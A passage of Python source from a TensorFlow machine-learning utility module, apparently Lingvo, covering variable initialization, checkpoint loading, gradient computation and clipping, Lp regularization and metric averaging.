minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = init_ops.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling']:
v_init = init_ops.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = init_ops.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = init_ops.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
# pylint: disable=unused-argument
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random.uniform(shape, -limit, limit, dtype, seed)
# pylint: enable=unused-argument
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = init_ops.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type not supported.'
if dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
def GetVar(reuse=reuse):
"""reuse: Whether to reuse the variables."""
var_shape = GetVariableShapePrefixes() + list(shape)
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=scope.use_resource or use_resource_variables())
with tf.variable_scope(var_scope), \
tf.variable_scope(var_name, reuse=reuse) as scope:
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
else:
with tf.device(''):
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
if _get_opportunistic_variable_reuse()[0]:
try:
var = GetVar()
except ValueError: # Possibly the variable already exists
var = GetVar(reuse=True)
else:
var = GetVar()
# Partitioning annotation
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p, ('Cached config:\n %s vs new config:\n %s' %
(cached.ToText(), p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.Copy()
for col in p.collections:
tf.add_to_collection(col, var)
if _FromGlobal('no_identity_on_vars'):
#with tf.device(var.device):
return var, var
else:
# This tf.identity colocated with var.
#with tf.device(var.device):
#if p.xla_num_partitions:
# xla_ref = xla_sharding.split(var, p.xla_partition_dim, p.xla_num_partitions, use_sharding_op=True)
# return xla_ref, var
return tf.identity(var), var
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
# module load time, because it let's us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = []
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.append(global_step_tensor)
try:
yield
except:
raise
finally:
_GLOBAL_STEP_STACK.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK:
return _GLOBAL_STEP_STACK[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(
GetGlobalVariableScope(), use_resource=use_resource_variables()):
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity(object):
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
vars_to_load = []
for model_var in all_vars:
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match or any(
re.match(r, model_var.name) for r in var_ignore_rules):
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s', model_var, checkpoint_var_name)
vars_to_load.append((checkpoint_var_name, model_var))
break
return vars_to_load
def OverrideVarsFromCheckpoint(sess, all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Overrides variables from a provided checkpoint."""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules)
if not vars_to_load:
raise ValueError(('Variable loading rules did not match any vars. '
'All known: %r') % [v.name for v in all_vars])
load_var_names = sorted([v.name for _, v in vars_to_load])
tf.logging.info('Overriding vars from checkpoint: %r', load_var_names)
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
tf.train.Saver(var_list=unique_vars_to_load).restore(sess, checkpoint_path)
vars_to_load = remaining_vars_to_load
def OverrideVarsFromCheckpoints(session, all_vars, ckpts_loading_rules):
"""Overrides model variables from checkpoints.
Args:
session: Tensorflow session.
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
var_refs_to_override = [
var[1].experimental_ref()
for var in _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1])
]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
OverrideVarsFromCheckpoint(session, all_vars, ckpt_path, loading_rules[0],
loading_rules[1])
var_refs_overridden.update(var_refs_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
def ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients):
return tf.gradients(
loss,
all_vars,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def ComputeTpuEmbeddingGradients(loss, activation_dict, tpu_embedding):
"""Returns a TpuEmbedding SendGradient op.
Args:
loss: The loss to backprop from.
activation_dict: String feature -> embedding activations dict.
tpu_embedding: TPUEmbedding instance.
"""
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
grads = tf.gradients(loss, list(activation_dict.values()))
feature_to_gradient_dict = py_collections.OrderedDict(
zip(list(activation_dict.keys()), grads))
send_gradient_op = tpu_embedding.generate_send_gradients_op(
feature_to_gradient_dict)
return send_gradient_op
def _ComputeGradientsTpu(loss,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
skip_zero_gradients=None,
use_bf16_gradients_ar=False):
"""Computes gradients for local loss across whole TPU cluster.
This implementation specializes for the case where weight params maybe used
for different number of times in the forward computation, so that gradients
should be normalized by the actual number of times they are being computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss: The loss to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce.
Returns:
Gradients to be passed back.
Raises:
ValueError: upon invalid arguments.
"""
if not skip_zero_gradients:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients)
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
if use_bf16_gradients_ar:
g = tf.cast(g, tf.bfloat16)
with tf.ops.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads
class VarGrad(object):
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def ComputeGradients(
loss,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss: A scalar Tensor.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
operations. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
* None: do not skip zero gradients;
* `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
* `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
"""
loss = HasRank(loss, 0)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss'.
trainable_variables = set(tf.trainable_variables())
dependent_ops_and_tensors = set(FindNeeded([loss]))
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar)
else:
take_grad = ComputeGradientsSimple
grads = take_grad(loss, filtered_vlist, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients)
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
# TPU training is not compatible with the variable name check below when
# control flow v2 is enabled. The main reason is the body function will be
# encapsulated as a TF function while variables will be lifted out, and as a
# result dependent_ops_and_tensors will not contain any variables. See
# b/150689507 for more info.
if not tf.compat.v1.control_flow_v2_enabled():
# Check that gradients for variables that are not needed by current task is
# empty.
def CheckGrad(vg):
if vg.var.name not in dependent_ops_and_tensors and vg.grad is not None:
err_msg = ('Variable %s is not a dependent of %s, expect '
'gradient be None, but got %s. This should not happen, '
'please contact the owner of b/150689507 for further '
'investigation.' % (str(vg.var), str(loss), str(vg.grad)))
assert False, err_msg
return True
var_grads = var_grads.Filter(CheckGrad)
# Removes pairs whose grad is None.
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any(
[HasNanOrInf(tf.math.real(x)),
HasNanOrInf(tf.math.imag(x))])
return tf.reduce_any(
tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x)))
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return v not in tf.get_collection(SKIP_LP_REGULARIZATION)
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
# Note: IndexedSlces appears for embedding lookups.
# Embedding lookup ids can have duplicate. For duplicated ids, we
# only want to consider once for each ids.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
# Counts is a vector of size vocab_size. counts[i] is i-th words
# occurances in 'ids'.
counts = tf.math.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.math.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif var not in tf.get_collection(SKIP_LP_REGULARIZATION):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
x: a Tensor, or a list or NestMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in six.iteritems(x):
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def AddToPruningCollections(weight,
mask,
threshold,
gradient=None,
old_weight=None,
old_old_weight=None):
"""Add mask, threshold, and weight vars to their respective collections."""
if mask not in tf.get_collection(pruning.MASK_COLLECTION):
tf.add_to_collection(pruning.WEIGHT_COLLECTION, weight)
tf.add_to_collection(pruning.MASK_COLLECTION, mask)
tf.add_to_collection(pruning.THRESHOLD_COLLECTION, threshold)
# Add gradient, old_weight, and old_old_weight to collections approximating
# gradient and hessian, where old_weight is the weight tensor one step
# before and old_old_weight is the weight tensor two steps before.
if gradient is not None:
assert old_weight is not None
assert old_old_weight is not None
tf.add_to_collection(pruning.WEIGHT_GRADIENT_COLLECTION, gradient)
tf.add_to_collection(pruning.OLD_WEIGHT_COLLECTION, old_weight)
tf.add_to_collection(pruning.OLD_OLD_WEIGHT_COLLECTION, old_old_weight)
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
sum_reduction_fn: called to reduce the values and weights to single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
avg = sum_reduction_fn(values * tf.cast(weights, values.dtype)) / tf.cast(
total_weight, values.dtype)
return avg, total_weight
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
ret_dict - dictionary of weighted averages of each metrics.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in six.iteritems(m):
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(six.iteritems(lists_of_metrics)):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in six.iteritems(m):
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(six.iteritems(lists_of_per_example)):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
Keys must either exist in all metrics, in which it will be processed as a
weighted sum, or exist in only one metrics, in which case it will be copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set([
k for loss_metrics, _ in loss_metric_weight_pairs
for k in six.iterkeys(loss_metrics)
])
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
raise ValueError('Found metric %s which exists in more than one'
'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
def _AddVN(p, x, step=None):
assert p.vn.scale is not None
seed = p.vn.seed
if seed and step:
seed += step * 203984
noises = tf.cast(p.vn.scale, x.dtype) * tf.random.normal(
